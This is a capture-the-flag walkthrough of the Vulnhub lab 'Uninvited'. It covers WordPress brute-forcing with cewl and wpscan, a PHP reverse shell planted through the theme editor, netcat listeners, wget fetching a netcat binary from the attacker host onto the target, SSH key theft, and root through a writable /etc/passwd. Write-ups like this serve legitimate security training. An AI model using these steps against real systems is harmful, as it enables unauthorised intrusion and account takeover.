Posts Uninvited Writeup [Vulnhub]
Post
Cancel

Uninvited Writeup [Vulnhub]

Uninvited is a machine from Vulnhub with a difficulty between intermediate and hard according to its creator. It consists on enumerating and bruteforcing wordpress in order to gain initial access, then, taking advantage of a backdoor we can escape the docker container and finally we can abuse misconfigured file permissions to obtain root.

Enumeration

As this machine is from Vulnhub , we are going to perform a ping sweep in order to find which ip from our local network has been assigned to this box .

The simple bash script is the following :

1
2
3
4
5
6
7
8
9
10
11
#!/bin/bash
if [ "$1" ==  "" ]
then
echo "You forgot an IP adress!"
echo "Syntax: ./ip_scan.sh 192.168.1"
else
for ip in `seq 1 254`; do
ping -c 1 $1.$ip | grep "64 bytes" | cut -d " " -f 4 | tr -d ":" &
done
fi

Running it we find this machine’s ip is 192.168.100.18 :

1
2
3
4
5
6
noxious@kali:~/Desktop$ ./pingsweep.sh 192.168.100
192.168.100.8
192.168.100.10
192.168.100.14
192.168.100.1
192.168.100.18

Now we can run nmap to find which ports are open :

1
2
3
4
5
6
7
8
9
10
nmap -p- 192.168.100.18
Starting Nmap 7.80 ( https://nmap.org ) at 2020-09-20 13:28 CEST                                                           
Nmap scan report for 192.168.100.18                                                                                        
Host is up (0.019s latency).                                                                                               
Not shown: 65531 closed ports                                                                                              
PORT      STATE    SERVICE                                                                                                 
80/tcp    open     http                                                                                                    
7894/tcp  open     unknown                                                                                                 
11566/tcp filtered unknown                                                                                                 
60000/tcp open     unknown

And we run some default scripts on them :

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
nmap -sC -sV -p 7894,11566,60000 192.168.100.18
Starting Nmap 7.80 ( https://nmap.org ) at 2020-09-20 14:00 CEST
Nmap scan report for 192.168.100.18
Host is up (0.052s latency).

PORT      STATE  SERVICE VERSION
7894/tcp  open   ssh     OpenSSH 7.6p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 af:d2:42:e4:31:ff:4f:fb:0b:de:18:e9:3f:c4:bc:42 (RSA)
|   256 97:56:47:40:ea:99:b2:a6:1a:a5:59:56:7e:2b:b4:a0 (ECDSA)
|_  256 b2:b1:67:44:75:f6:d8:32:a2:f2:ff:7f:09:a7:7d:53 (ED25519)
11566/tcp closed unknown
60000/tcp open   http    Apache httpd 2.4.38 ((Debian))
|_http-generator: WordPress 5.4.2
| http-robots.txt: 1 disallowed entry
|_/wp-admin/
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: UNINVITED
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Browsing to port 80 we find the following site :

Web

Inspecting its source code we find a b64 encoded comment :

Web

Next we decode it :

1
2
echo "WWVhaCEgSSBrbm93IGl0IGhhcHBlbnMuLi4gSSBndWVzcyB1IG1pZ2h0IHdhbnQgdG8gYWRkIHRoaXMgW2ZpZWxkZm9yY2VdIHRvIHlvdXIgaG9zdHM=" | base64 -d
Yeah! I know it happens... I guess u might want to add this [fieldforce] to your hosts

So we add fieldforce to /etc/hosts and access it at port 60000 :

Web

Running gobuster to enumerate hidden directories we get /backdoor, which reveals the wordpress login page :

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
gobuster dir -u http://fieldforce:60000/ -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt -t 200 -q
/wp-content (Status: 301)
/h (Status: 301)
/atom (Status: 200)
/rss2 (Status: 200)
/wp-includes (Status: 301)
/sa (Status: 301)
/rdf (Status: 200)
/sample (Status: 301)
/page1 (Status: 200)
/' (Status: 301)
/he (Status: 301)
/%20 (Status: 301)
/sam (Status: 301)
/hello (Status: 301)
/2020 (Status: 301)
/wp-admin (Status: 301)
/backdoor (Status: 302)
/0000 (Status: 301)

Web

As the site is running wordpress, we can use cewl to create a custom wordlist and then bruteforce this login page with wpscan :

1
 cewl http://fieldforce:60000/ --with-numbers -d 2 -m 4 -w wordlist.txt
1
2
3
4
5
6
7
8
9
10
11
12
wpscan --url http://fieldforce:60000/ -P Desktop/wordlist.txt


[+] Performing password attack on Xmlrpc against 2 user/s
[SUCCESS] - elliot / wh1ter0se                                                                                             
[SUCCESS] - Elliot / wh1ter0se                                                                                             
Trying Elliot / wh1ter0se Time: 00:00:35 <======================                      > (1918 / 3836) 50.00%  ETA: ??:??:??

[!] Valid Combinations Found:
 | Username: elliot, Password: wh1ter0se
 | Username: Elliot, Password: wh1ter0se

Now, with these set of credentials we can log in to the site :

Web

Exploitation

We can get a reverse shell going to theme editor and editing a non active theme such as twenty nineteen with the following php reverse shell

Web

Afterwards, we make that theme the active one and trigger the shell :

1
curl http://fieldforce:60000/404.php

Obtaining a reverse connection as www-data :

1
2
3
4
5
6
7
8
9
10
nc -lvnp 443
listening on [any] 443 ...
connect to [192.168.100.10] from (UNKNOWN) [192.168.100.18] 45660
Linux f950b9c50e1d 4.15.0-20-generic #21-Ubuntu SMP Tue Apr 24 06:16:15 UTC 2018 x86_64 GNU/Linux
 14:18:10 up 17 min,  0 users,  load average: 0.07, 0.06, 0.06
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

After upgrading the shell it seems that we are inside a docker container, then , we discover a note that contains a hint :

1
2
3
4
5
6
 www-data@f950b9c50e1d:/home/demodocker/.local$ cat note.txt
ZW5jb2RlZCB0d2ljZSBMUzB0YVhBdExTMHZabk52WTJsbGRIa3VaWGhs
www-data@f950b9c50e1d:/home/demodocker/.local$ echo "ZW5jb2RlZCB0d2ljZSBMUzB0YVhBdExTMHZabk52WTJsbGRIa3VaWGhs" | base64 -d
encoded twice LS0taXAtLS0vZnNvY2lldHkuZXhl
www-data@f950b9c50e1d:/home/demodocker/.local$ echo "LS0taXAtLS0vZnNvY2lldHkuZXhl" | base64 -d
---ip---/fsociety.exewww-data@f950b9c50e1d:/home/demodocker/.local$

We can download that file with wget :

1
wget 192.168.100.18/fsociety.exe

As it is an exe file , we can use wine to execute it, the program asks for a set of credentials which following the machine’s theme are trivial to guess :

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
 root@kali:/home/noxious/Downloads# wine fsociety.exe
WELCOME TO BACKDOOR

-------------------
+++++++++++++++++++
===================


USERNAME : elliot
PASSWORD : mrrobot
===================

\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\
User has been identified, Welcome elliot
###############################################################

TH3 H!N7

\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\
Do you know python-reverse-shell client/server socket program?

If IP_Address is 172.18.0.2, use port 9999

If IP_Address is 172.18.0.3, use port 8888

Remember 'PATIENCE' is the KEY
\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\

Press Enter!

We check the ip and as netcat is not in the machine, we upload it :

1
2
3
4
 www-data@f950b9c50e1d:/tmp$ ifconfig | grep 172.18.0
        inet 172.18.0.3  netmask 255.255.0.0  broadcast 172.18.255.255
www-data@f950b9c50e1d:/tmp$ which nc
www-data@f950b9c50e1d:/tmp$ wget http://192.168.100.10/nc

Then we can start our listener at port 8888, obtaining a connection :

1
2
3
4
5
6
www-data@f950b9c50e1d:/tmp$ ./nc -lvnp 8888
listening on [any] 8888 ...
connect to [172.18.0.3] from (UNKNOWN) [172.18.0.1] 59106

/home/docksec> id
uid=1001(docksec) gid=1001(docksec) groups=1001(docksec)

The first flag can be read :

1
2
3
4
5
6
7
8
9
10
11
12
13
/home/docksec> ls
user1.txt
/home/docksec> cat user1.txt
 _______ __   __ ___ ___     _______
|       |  |_|  |   |   |   |       |
|  _____|       |   |   |   |    ___|
| |_____|       |   |   |   |   |___
|_____  |       |   |   |___|    ___|
 _____| | ||_|| |   |       |   |___
|_______|_|   |_|___|_______|_______|


FLAG{DASDGFGPXLCKDEG5D7635CSDAFDIMMJDSUWEQDSADIG}

The session obtained closes when we run a cd command, so we can aim to read the private ssh keys in order to gain a more stable shell :

1
/home/docksec> cat .ssh/id_rsa

And we get a shell logging through ssh which in this case is running at port 7894:

1
ssh docksec@192.168.100.18 -i id_rsa -p 7894

Privilege Escalation

Enumerating the machine we see we have writing privileges to modify /etc/passwd

1
2
docksec@uninvited:~$ ls -la /etc/passwd
-rwxrwxrwx 1 777 root 1628 Sep 20 22:29 /etc/passwd

So we can just generate a new password with openssl and insert it with a text editor such as nano :

1
2
3
4
openssl passwd noxious
EfsRhwv.xHlkw
docksec@uninvited:~$ cat /etc/passwd | head -n 1
root:EfsRhwv.xHlkw:0:0:root:/root:/bin/bash

Finally we can access root using our password and obtain the third flag:

1
2
3
4
5
6
7
8
9
10
docksec@uninvited:~$ su root
Password:
root@uninvited:/home/docksec# cat /root/root.txt
.__            .__  __             .___
__ __  ____ |__| _______  _|___/  |_  ____   __| _/
|  |  \/    \|  |/    \  \/ |  \   ___/ __ \ / __ |  
|  |  |   |  |  |   |  \   /|  ||  | \  ___// /_/ |  
|____/|___|  |__|___|  /\_/ |__||__|  \___  \____ |  
\/        \/                   \/     \/
FLAG{58DSFJ74RFWESD8J2LKJGHJ87ER4QREWRFLMSTDCMGKAASD}

We got the docker flag left, which can be obtained now as we have full privileges.

First we list docker containers:

1
2
3
4
root@uninvited:~# docker container list
CONTAINER ID        IMAGE               COMMAND                  CREATED             STATUS              PORTS                   NAMES
f950b9c50e1d        wordpress:latest    "docker-entrypoint.s…"   7 weeks ago         Up 29 minutes       0.0.0.0:60000->80/tcp   wordpress_wordpress_1_dd9b95034d3d
982523fa9f5f        mysql:5.7           "docker-entrypoint.s…"   7 weeks ago         Up 29 minutes       3306/tcp, 33060/tcp     wordpress_db_1_9676244bc9b2

Now we can execute it and cat the flag :

1
2
3
4
5
6
7
8
9
10
11
root@uninvited:~# docker exec wordpress_wordpress_1_dd9b95034d3d cat /home/demodocker/user2.txt
   ___  ____  _______ __
  /  _]/    |/ ___/  |  |
 /  [_|  o  (   \_|  |  |
|    _]     |\__  |  ~  |
|   [_|  _  |/  \ |___, |
|     |  |  |\    |     |
|_____|__|__| \___|____/   RIGHT ????????                     


FLAG{FPDSNRWEBT513SDASDHTYHMDSARTSIJO32SDFH}
This post is licensed under CC BY 4.0 by the author.